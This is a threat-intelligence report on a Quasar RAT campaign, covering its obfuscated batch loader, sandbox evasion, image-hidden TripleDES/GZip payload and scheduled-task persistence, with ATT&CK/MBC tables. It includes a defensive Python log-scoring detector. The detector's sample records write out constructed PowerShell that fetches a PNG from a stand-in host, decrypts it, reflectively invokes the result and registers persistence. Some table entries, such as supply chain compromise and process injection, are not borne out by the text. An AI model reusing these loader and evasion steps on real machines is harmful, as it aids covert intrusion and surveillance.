EXECUTIVE SUMMARY:
An ongoing campaign has been identified leveraging Quasar RAT, a widely circulated remote access trojan. This operation delivers the malware through a two-stage infection mechanism beginning with an obfuscated batch script. Victims are enticed using a decoy Office document themed around a game purchase agreement. The file execution flow begins with a Windows script that triggers the download of an additional batch file while simultaneously opening a non-malicious document to distract the user. This approach is specifically designed to decrease suspicion during the initial access phase. The second-stage batch file is heavily obfuscated, making static analysis and sandbox detection more difficult. It reconstructs and executes a multi-part payload delivery mechanism using native Windows utilities, particularly PowerShell. The campaign's use of evasion tactics and covert downloading methods introduces high operational risk to enterprises. Systems running Windows OS are particularly at risk due to the use of native scripting tools that require no external dependencies, making this attack difficult to detect without behavioral monitoring. Potential business impact includes unauthorized remote access, data theft, and covert surveillance on affected networks, especially in sectors lacking endpoint visibility or behavioral anomaly detection.
The initial infection vector is a batch script which sets multiple environment variables and opens a decoy document to divert attention. This script silently downloads a second batch file from a remote hosting service. The downloaded file is extensively obfuscated, utilizing meaningless environment variable names, excessive use of goto statements, and code fragmentation. This technique is intended to complicate reverse engineering and automated detection.

The script constructs and launches two PowerShell instances. The first PowerShell command performs sandbox evasion by querying disk names using the Get-Disk cmdlet. If the system disk is named with common sandbox identifiers like "QEMU HARDDISK," the script terminates itself, thereby avoiding analysis. The second PowerShell segment handles the core infection sequence by downloading a PNG image containing a base64-encoded payload. This image is fetched from a public file-sharing platform and decoded in-memory. The payload is decrypted using Triple DES in ECB mode with a hardcoded key and further decompressed using GZip streams. This results in a .NET assembly that is executed through reflection via GetAssemblies and Invoke methods.

Additionally, the script implements persistence by registering a scheduled task using a locally dropped XML configuration. This ensures the malware's survival across reboots, facilitating prolonged remote access and potential lateral movement. Command-and-control communications are configured through a dynamic DNS-based relay, allowing attacker-controlled infrastructure flexibility.
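The behaviours described above (a Get-Disk sandbox check, an image download followed by Base64 decoding, Triple DES in ECB mode, GZip decompression, reflective invocation and scheduled-task registration from an XML file) are all visible in PowerShell script block logging (Event ID 4104), because the obfuscated batch file has to hand PowerShell readable commands. The following Python is an added detection example, not code from the report or from the campaign: it scores logged script blocks against those behaviours, so that a lone Base64 decode or a lone image download stays below the alert threshold while either stage of this chain reaches it. The regex patterns, weights, threshold, host names and the sample script text are all constructed for this example; the key string in the sample is a placeholder.

```python
import re

# Behavioural indicators for the two PowerShell stages described above.
# Each entry is (indicator name, regexes that must ALL match, weight).
# These patterns are assumptions written for this example; they are not
# signatures lifted from the campaign's actual script.
INDICATORS = [
    ("sandbox_disk_check",
     [r"\bGet-Disk\b", r"QEMU|VBOX|VirtualBox|VMware|Virtual HD"], 3),
    ("remote_image_fetch",
     [r"Invoke-WebRequest|DownloadData|DownloadString|DownloadFile|Net\.WebClient",
      r"\.(png|jpe?g|gif|bmp)\b"], 2),
    ("base64_decode", [r"\[Convert\]::FromBase64String"], 1),
    ("tripledes_ecb", [r"TripleDES", r"CipherMode\]::ECB"], 3),
    ("gzip_decompress", [r"GZipStream", r"CompressionMode\]::Decompress"], 2),
    ("reflective_invoke",
     [r"\[Reflection\.Assembly\]::Load|GetAssemblies\(\)", r"\.Invoke\("], 3),
    ("scheduled_task_from_xml",
     [r"Register-ScheduledTask[^\n]*-Xml|schtasks(\.exe)?[^\n]*/create[^\n]*/xml"], 2),
]
_COMPILED = [(name, [re.compile(p, re.IGNORECASE) for p in pats], weight)
             for name, pats, weight in INDICATORS]

# A single weak hit (a lone Base64 decode, a lone image download) stays below
# this; the stage-1 sandbox check or any pair of stage-2 steps reaches it.
DEFAULT_THRESHOLD = 3


def score_script_block(text):
    """Score one logged script block; returns (score, [matched indicator names])."""
    hits = [name for name, pats, _ in _COMPILED if all(p.search(text) for p in pats)]
    score = sum(weight for name, _, weight in _COMPILED if name in hits)
    return score, hits


def triage(records, threshold=DEFAULT_THRESHOLD):
    """Flag Event ID 4104 (script block) records whose score reaches threshold."""
    flagged = []
    for rec in records:
        if rec.get("event_id") != 4104:
            continue  # only script-block text is scored
        score, hits = score_script_block(rec["script_block"])
        if score >= threshold:
            flagged.append({"computer": rec["computer"], "score": score, "indicators": hits})
    return flagged


# Constructed sample records in the shape of Microsoft-Windows-PowerShell/Operational
# 4104 events. The script text is written for this example to carry the behaviours
# described above; it is not the campaign's real code, and the key is a placeholder.
SAMPLE_RECORDS = [
    {"event_id": 4104, "computer": "WS-ANALYST-01", "script_block":
     "$names = Get-Disk | Select-Object -ExpandProperty FriendlyName\n"
     "if ($names -match 'QEMU HARDDISK') { exit }\n"},
    {"event_id": 4104, "computer": "WS-FINANCE-07", "script_block":
     "$png = (New-Object Net.WebClient).DownloadData('https://files.example.invalid/logo.png')\n"
     "$raw = [Convert]::FromBase64String($b64)\n"
     "$tdes = [Security.Cryptography.TripleDES]::Create()\n"
     "$tdes.Mode = [Security.Cryptography.CipherMode]::ECB\n"
     "$tdes.Key = [Text.Encoding]::ASCII.GetBytes('<hardcoded-key-placeholder>')\n"
     "$gz = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)\n"
     "$asm = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.FullName -like 'Stage*' }\n"
     "$asm.EntryPoint.Invoke($null, $null)\n"
     "Register-ScheduledTask -Xml (Get-Content \"$env:TEMP\\task.xml\" -Raw) -TaskName 'Update'\n"},
    {"event_id": 4104, "computer": "SRV-STORAGE-02", "script_block":
     "Get-Disk | Where-Object PartitionStyle -eq 'RAW' | Initialize-Disk -PartitionStyle GPT\n"
     "Register-ScheduledTask -TaskName 'Backup' -Action (New-ScheduledTaskAction -Execute 'backup.exe') "
     "-Trigger (New-ScheduledTaskTrigger -Daily -At 2am)\n"},
    {"event_id": 4104, "computer": "WS-DEV-03", "script_block":
     "$token = [Convert]::FromBase64String($env:API_TOKEN_B64)\n"},
    {"event_id": 4103, "computer": "WS-DEV-03", "script_block": "Get-Disk QEMU HARDDISK"},  # skipped: not 4104
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_RECORDS):
        print(f"{hit['computer']}: score={hit['score']} indicators={', '.join(hit['indicators'])}")
```

Requiring every regex of an indicator to match the same script block is what keeps the storage server's legitimate Get-Disk and Register-ScheduledTask usage at zero: the sandbox check needs a hypervisor string next to the cmdlet, and the persistence indicator needs the -Xml parameter that the XML-file registration described above would use. Because the batch-level obfuscation never reaches the 4104 record, this scoring works on the de-obfuscated command text PowerShell actually ran, which is the point of enabling script block logging on Windows endpoints.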
This Quasar RAT campaign exemplifies a well-engineered malware deployment strategy combining obfuscation, sandbox evasion, and steganographic payload delivery. The dual PowerShell stages, one for anti-analysis and another for payload decryption and execution, demonstrate a layered and modular approach to infection. The use of legitimate file-hosting platforms and image files for payload delivery reflects an increasing trend of using non-executable formats to bypass network and host-based filters. By leveraging Windows-native tools, the attackers ensure stealth, avoiding the need to introduce suspicious binaries into the system. Persistence through scheduled tasks indicates a strategic goal of maintaining long-term access to compromised environments. This activity underscores the ongoing evolution of remote access trojans and their distribution tactics, particularly those that exploit trust and simplicity to bypass conventional defenses. The campaign's infrastructure and behavior align with trends observed in recent malware distribution operations where low detection and multi-layered payload delivery are prioritized. Its relevance is elevated by the RAT's open-source nature, which allows constant modification and repackaging by multiple threat actors. This makes Quasar RAT-based campaigns a persistent and adaptable threat within the current cyber threat landscape.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
|---|---|---|---|
| Initial Access | T1195 | Supply Chain Compromise | - |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Execution | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion | System Checks |
| Defense Evasion | T1027 | Obfuscated Files or Information | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
|---|---|---|
| Anti-Behavioral Analysis | B0036 | Integrity Checking |
| Persistence | B0013 | Scheduled Task |
| Execution | B0034 | Process Injection |
| Defense Evasion | B0009 | Virtualization/Sandbox Evasion |
| Defense Evasion | B0032 | Obfuscated Files or Information |
| Command and Control | B0030 | Web Service |
| Data Manipulation | B0058 | Decryption |
| Data Manipulation | B0060 | Decompression |
REFERENCES:
The following reports contain further technical details: